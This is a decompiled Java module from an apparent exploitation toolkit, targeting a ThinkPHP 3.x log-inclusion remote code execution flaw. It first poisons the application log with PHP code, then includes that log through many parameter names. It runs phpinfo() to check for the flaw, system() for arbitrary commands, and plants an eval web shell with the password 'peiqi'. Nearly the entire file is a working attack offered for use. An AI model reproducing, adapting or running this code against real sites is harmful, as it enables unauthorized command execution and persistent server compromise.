package exploit;

import com.github.kevinsawicki.http.HttpRequest;
import java.util.ArrayList;
import java.util.Date;
import java.util.Iterator;
import util.BasePayload;
import util.Result;

/* loaded from: input_file:exploit/tp3_log_rce.class */
public class tp3_log_rce implements BasePayload {
    Date dt = new Date();
    String year = String.format("%tY", this.dt);
    String mon = String.format("%tm", this.dt);
    String day = String.format("%td", this.dt);
    String suffix1 = this.year.substring(2, 4) + "_" + this.mon + "_" + this.day + ".log";

    @Override // util.BasePayload
    public Result checkVUL(final String str) throws Exception {
        String str2 = str + "?m=Home&c=Index&a=index&test=--><?=phpinfo();?>";
        Iterator<String> it = new ArrayList<String>() { // from class: exploit.tp3_log_rce.1
            {
                add(str + "/?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/" + tp3_log_rce.this.suffix1);
                add(str + "/?m=Home&c=Index&a=index&info[_filename]=./Application/Runtime/Logs/Home/" + tp3_log_rce.this.suffix1);
                add(str + "/?m=Home&c=Index&a=index&param[_filename]=./Application/Runtime/Logs/Home/" + tp3_log_rce.this.suffix1);
                add(str + "/?m=Home&c=Index&a=index&name[_filename]=./Application/Runtime/Logs/Home/" + tp3_log_rce.this.suffix1);
                add(str + "/?m=Home&c=Index&a=index&array[_filename]=./Application/Runtime/Logs/Home/" + tp3_log_rce.this.suffix1);
                add(str + "/?m=Home&c=Index&a=index&arr[_filename]=./Application/Runtime/Logs/Home/" + tp3_log_rce.this.suffix1);
                add(str + "/?m=Home&c=Index&a=index&list[_filename]=./Application/Runtime/Logs/Home/" + tp3_log_rce.this.suffix1);
                add(str + "/?m=Home&c=Index&a=index&page[_filename]=./Application/Runtime/Logs/Home/" + tp3_log_rce.this.suffix1);
                add(str + "/?m=Home&c=Index&a=index&menus[_filename]=./Application/Runtime/Logs/Home/" + tp3_log_rce.this.suffix1);
                add(str + "/?m=Home&c=Index&a=index&var[_filename]=./Application/Runtime/Logs/Home/" + tp3_log_rce.this.suffix1);
                add(str + "/?m=Home&c=Index&a=index&data[_filename]=./Application/Runtime/Logs/Home/" + tp3_log_rce.this.suffix1);
                add(str + "/?m=Home&c=Index&a=index&module[_filename]=./Application/Runtime/Logs/Home/" + tp3_log_rce.this.suffix1);
            }
        }.iterator();
        while (it.hasNext()) {
            String next = it.next();
            try {
                HttpRequest.get(str2).body();
            } catch (Exception e) {
                e.printStackTrace();
            }
            if (HttpRequest.get(next).body().contains("PHP Version")) {
                return new Result(true, "ThinkPHP 3.x Log RCE", next);
            }
            continue;
        }
        return new Result(false, "ThinkPHP 3.x Log RCE", "");
    }

    @Override // util.BasePayload
    public Result exeVUL(String str, String str2) throws Exception {
        String str3 = str + "/?m=Home&c=Index&a=index&test=--><?=system('" + str2 + "');?>";
        String str4 = str + "/?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/" + this.suffix1;
        try {
            HttpRequest.get(str3).body();
            if (HttpRequest.get(str4).code() == 200) {
                return new Result(true, null, str4);
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
        return new Result(false, null, "");
    }

    @Override // util.BasePayload
    public Result getShell(String str) throws Exception {
        String str2 = str + "/?m=Home&c=Index&a=index&test=--><?=@eval($_POST['peiqi']);?>";
        String str3 = str + "/?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/" + this.suffix1;
        try {
            HttpRequest.get(str2).body();
            if (HttpRequest.get(str3).code() == 200) {
                return new Result(true, null, str3 + "   Pass:peiqi");
            }
            return null;
        } catch (Exception e) {
            e.printStackTrace();
            return null;
        }
    }
}
